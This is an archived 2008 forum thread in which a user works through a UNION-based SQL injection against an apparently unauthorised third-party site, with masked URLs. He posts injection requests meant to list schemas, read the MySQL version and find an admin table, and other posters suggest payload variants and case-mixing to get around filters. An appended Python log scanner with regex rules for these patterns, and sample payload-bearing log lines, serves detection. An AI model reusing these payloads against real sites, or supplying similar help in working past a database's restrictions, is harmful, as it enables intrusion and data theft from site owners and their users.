IT Security and Insecurity Portal

SQL Injection troubles : SELECT command denied

Posted: Mon Oct 20, 2008 9:19 pm
pinkman
Regular user
Joined: Oct 21, 2008
Posts: 5

Hi all,
I've got some trouble with a SQL injection:
Code:
http://**/homepage-liste.php?rubrique=-1+AND+1=0+UNION+SELECT+ALL+1,2,3,4,5,group_concat(schema_name),7,8,9,10,11,12,13,14+from+information_schema.schemata/*
It says:
Code:
SELECT command denied to user '***_actualites'@'localhost' for table 'schemata'
NB: columns 6 and 7 are vulnerable.
The MySQL version is 4 and I had to use unhex(hex(@@version)):
Code:
homepage-liste.php?rubrique=-1+AND+1=0+UNION+SELECT+ALL+1,2,3,4,5,unhex(hex(@@version)),7,8,9,10,11,12,13,14/*
which gives:
Code:
4.1.11-Debian_4-log
Another strange thing that I do not understand:
Code:
http://***actualites/homepage-liste.php?rubrique=-1+AND+1=0+UNION+SELECT+ALL+1,2,3,4,5,6,7,8,9,10,11,12,13,14+from%20admin/*
The answer:
Code:
Table '***_actualites.admin' doesn't exist
So my questions are:
1. How do I bypass this restriction?
2. Do I have to use blind SQL injection because of MySQL 4?
3. If I had to use unhex(hex(@@version)), should the SQL injection code have been in hex(sqlcode)?
NB: I use the following paper: http://milw0rm.com/papers/225
Thanks

Posted: Mon Oct 20, 2008 11:00 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Try "information_schema.tables", it should be accessible.
And if you use UNHEX(HEX(@@version)), then the result is plaintext, not hex-encoded.

Posted: Tue Oct 21, 2008 11:30 am
pinkman
Regular user
Joined: Oct 21, 2008
Posts: 5

That doesn't work:
Code:
http://****/actualites/homepage-liste.php?rubrique=-1+AND+1=0+UNION+SELECT+ALL+1,2,3,4,5,group_concat(schema_table),7,8,9,10,11,12,13,14+from+information_schema.tables/*
Which gives the same thing:
Code:
SELECT command denied to user '***_actualites'@'localhost' for table 'tables'
What I think is that the user doesn't have the rights/permissions to use the SELECT command.
So in this case, what could I do?
Thanks

Posted: Tue Oct 21, 2008 11:54 am
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Try this:
Code:
http://****/actualites/homepage-liste.php?rubrique=-1+UNION+SELECT+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14+FROM+information_schema.tables+LIMIT+1,1/*

Posted: Wed Oct 22, 2008 4:30 pm
pinkman
Regular user
Joined: Oct 21, 2008
Posts: 5

Still doesn't work
Code:
SELECT command denied to user '***_actualites'@'localhost' for table 'tables'

Posted: Wed Oct 22, 2008 6:09 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

OK, my mistake ... I should have realized before that you have MySQL version < 5.x, so no information_schema here ...

Posted: Wed Oct 22, 2008 10:15 pm
pinkman
Regular user
Joined: Oct 21, 2008
Posts: 5

Yep, that's the bad thing.
So I have to use blind SQL techniques.
But there is still one last question: why can't the user use the SELECT SQL command?

Posted: Tue Feb 10, 2009 5:26 pm
sangteamtham
Beginner
Joined: Feb 10, 2009
Posts: 1

Change sth like
UnIon SelECT **** FrOm informtion_schema.tables--
or /*

Posted: Tue Feb 10, 2009 6:04 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

sangteamtham wrote:
Change sth like
UnIon SelECT **** FrOm informtion_schema.tables--
or /*

It's MySQL ver. < 5.0 with no information_schema ...

Posted: Tue Feb 10, 2009 6:10 pm
ingh1pped
Advanced user
Joined: Dec 13, 2008
Posts: 88

All times are GMT
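
Seen from the server side, the requests quoted in this thread leave a recognisable trail in the web access log. The following is an added example, not part of any post above: a small Python scanner that decodes the query string of each log line and reports the markers that appear in the thread (UNION SELECT, information_schema, @@ server variables, a trailing comment). The log lines, rule names and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Markers taken from the request shapes quoted in the thread above.
RULES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\b", re.I),
    "server_variable": re.compile(r"@@\w+"),
    "trailing_comment": re.compile(r"(?:/\*|--|#)\s*$"),
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def normalise(query):
    """Decode '+' and %xx twice (catches double encoding), drop inline
    /**/ comments used to split keywords, and collapse whitespace."""
    text = unquote_plus(unquote_plus(query))
    text = re.sub(r"/\*.*?\*/", " ", text)
    return re.sub(r"\s+", " ", text).strip()

def scan_line(line):
    """Return the sorted names of the rules matching one access-log line."""
    match = REQUEST.search(line)
    if not match:
        return []
    query = normalise(urlsplit(match.group(1)).query)
    return sorted(name for name, rx in RULES.items() if rx.search(query))

def scan(lines):
    """Map 1-based line number -> matched rules, for flagged lines only."""
    return {n: hits for n, line in enumerate(lines, 1) if (hits := scan_line(line))}

# Constructed sample log (combined log format, documentation IP range).
SAMPLE_LOG = [
    '203.0.113.7 - - [20/Oct/2008:21:10:02 +0000] "GET /actualites/homepage-liste.php'
    '?rubrique=12 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [20/Oct/2008:21:19:40 +0000] "GET /actualites/homepage-liste.php'
    '?rubrique=-1+UNION+SELECT+1,unhex(hex(@@version)),3/* HTTP/1.1" 200 498',
    '203.0.113.7 - - [21/Oct/2008:11:30:05 +0000] "GET /actualites/homepage-liste.php'
    '?rubrique=-1%2520UnIon%2520SelECT%25201,2%2520FrOm%2520information_schema.tables--'
    ' HTTP/1.1" 200 311',
]

if __name__ == "__main__":
    for lineno, hits in scan(SAMPLE_LOG).items():
        print(lineno, ", ".join(hits))
```

A hit on `union_select` in a parameter that should only ever hold an integer, such as `rubrique` here, is worth alerting on regardless of the HTTP status returned.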